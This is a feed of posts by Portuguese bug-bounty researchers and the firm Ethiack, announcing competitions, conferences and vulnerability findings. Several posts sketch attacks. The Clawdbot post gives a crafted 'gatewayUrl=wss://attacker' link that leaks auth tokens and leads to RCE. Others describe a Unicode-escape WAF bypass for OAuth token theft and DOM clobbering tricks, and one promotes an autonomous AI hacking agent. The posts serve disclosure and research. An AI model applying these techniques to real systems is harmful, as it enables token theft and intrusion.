Hugo Ferreira

Como dizia o grande solnado .. "Façam o favor de ser felizes " !

Yesterday, we wrapped up our Q1 @Hacker0x01 Italy vs. Portugal hacking competition with an in-person day in Porto 🇵🇹 It was a great day of hacking together and connecting with the local community. Looking forward to the next one! #BugBounty

JavaScript files are a goldmine, but only if you can read them. 💎 JXScout v2 by @fneves97 takes client-side hacking to the next level: - Advanced source map reversal - Improved chunk discovery - AST-based vulnerability analysis Check it out on GitHub 👇

In a demo by @Ethiack, their Hackian AI agent achieved RCE on Clawdbot/Moltbot in under 2 hours. It abused public JS source maps to learn the WebSocket protocol, then used a gatewayUrl override (which controls where the UI connects) to steal auth tokens from the initial WebSocket connect message and run arbitrary tool calls. Full details 👇 ethiack.com/news/blog/one-… #BugBounty

Our Co-founder, André Baptista (@0xacb) was interviewed by Expresso Magazine during the Now Next NOS Summit about how AI is changing the rules of business and work for Portuguese companies. Check out the full article 👇 expresso.pt/iniciativasepr…

🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…

In Salesforce Commerce Cloud, @castilho101 found XSS where a JSON parameter gets rendered into HTML. Cloudflare WAF blocked his payloads, so he encoded characters as Unicode escapes (\u0073 for 's'). The WAF sees raw Unicode and allows it, but JSON.parse() on the server decodes it back into working JavaScript, letting him exfiltrate OAuth tokens for account takeover. Full write-up 👇 castilho.sh/salesforce-oau… #BugBounty

Everyone's talking about AI vs Humans?... What about... AI vs AI? ... Well... our curious research team made that question... and it result on this amazing Blog Post. Our Hackian growing so well! Give it a look!

Glad to see my research, "Fuzzing WebSockets for Server-Side Vulnerabilities", included in the nominations! Thanks to everyone who enjoyed it 😁

@aretekzs Nice chain, mate! You're not a skiddie anymore 😅

Recently, during an engagement, I encountered a self-XSS. The target used HttpOnly cookies, and none of the pages were iframable. If you are interested, this is how I managed to escalate it: aretekzs.com/posts/from-sel…

This week two massive CVEs affecting React and Next.js were released, with massive repercussions. CVE-2025-55182 and CVE-2025-66478 are critical unauthenticated RCE vulnerabilities affecting even default configurations. After the CVE was announced, we've begun working on a testing module, and we've started testing customers today. If you use React or Next.js, please upgrade to an hardened release immediately.

Our CTF is live and open to everyone right now until tomorrow 6pm UTC👇 Give it a try to learn some new techniques, and maybe pop some 0days 👀 ctf.bsideslisbon.org

Catch the Ethiack team at #Bsides Lisbon! 🤝 We're on site today and tomorrow. If you're attending, drop us a comment so we can connect!👇

Don't miss out! Our AI Scientist, Pedro Conde, will be delivering a keynote on "Hacking with AI" at the Mobile App Security Conference (#AppSec). He will talk about how we at Ethiack are exploring the use of fully autonomous "hackbots" - agentic AI systems designed for penetration testing.  🕓 When: November 3rd, 16:00 (CET) Our team will be at AppSec Prague, November 3-4. Let's connect and discuss application security and AI hacking.

I found out that you can use "ftp::" to convert a limited Dom Clobering situation into a full CSPT. Then, while talking about it with @LooseSecurity, he found that we can also use "https::" This can be used to prevent URL parsing of href, allowing us to hit other endpoints

🚨@BsidesLisbon CTF Quals starts now! 🔓Join at: quals.bsideslisbon.org #CTF #BSidesLisbon

A mini research I did about escalating an XSS using 414 and 431 server size limit errors, and how I escalated an XSS to account takeover using a Salesforce URL Limit Gadget on a Ecommerce website. Hope you enjoy it castilho.sh/scream-until-e…

We've got a new logo mark. ✨

You’re about to see the world’s first show & tell from a hackbot. Enjoy!

If you look at the AI-generated code below, you may notice that path traversal is prevented via basename functions. Can you still exploit it? Try here 👉 ai4eh.ethiack.ninja